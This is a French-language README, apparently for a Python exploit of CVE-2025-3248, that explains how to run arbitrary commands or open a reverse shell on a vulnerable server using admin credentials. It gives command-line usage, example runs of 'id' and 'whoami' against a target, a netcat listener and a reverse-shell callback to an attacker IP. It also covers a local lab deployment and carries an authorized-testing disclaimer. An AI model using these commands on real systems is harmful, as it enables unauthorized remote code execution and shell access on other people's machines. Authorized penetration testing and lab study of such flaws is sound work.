
Ce script Python exploite CVE-2025-3248 pour exécuter des commandes arbitraires ou générer un reverse shell sur un système vulnérable. L'authentification est requise pour utiliser cet exploit.
Ce script Python exploite CVE-2025-3248 pour exécuter des commandes arbitraires ou lancer un shell inversé sur un système vulnérable. L'authentification est requise pour utiliser cet exploit.
requestsInstallez les dépendances avec :
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Argument | Description | Requis |
|---|---|---|
-u, --url | URL de base cible (ex. : https://target.com) | Oui |
-l, --login | Nom d'utilisateur administrateur | Oui |
-p, --password | Mot de passe administrateur | Oui |
-c, --command | Commande à exécuter sur la cible | Non* |
--proxy | URL du proxy (ex. : http://127.0.0.1:8080) | Non |
--lhost | Hôte local pour le shell inversé | Non* |
--lport | Port local pour le shell inversé | Non* |
* Vous devez spécifier soit une commande (-c) soit à la fois --lhost et --lport pour un shell inversé.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Démarrez un écouteur sur votre machine :
nc -lvnp 4444
Exécutez ensuite :
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Vous pouvez déployer l'image Docker en utilisant la commande suivante :
podman compose up -d
L'image sera disponible à l'adresse http://localhost:7860.
Crédits pour le fichier compose : Ce dépôt
Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Ce readme est généré par IA.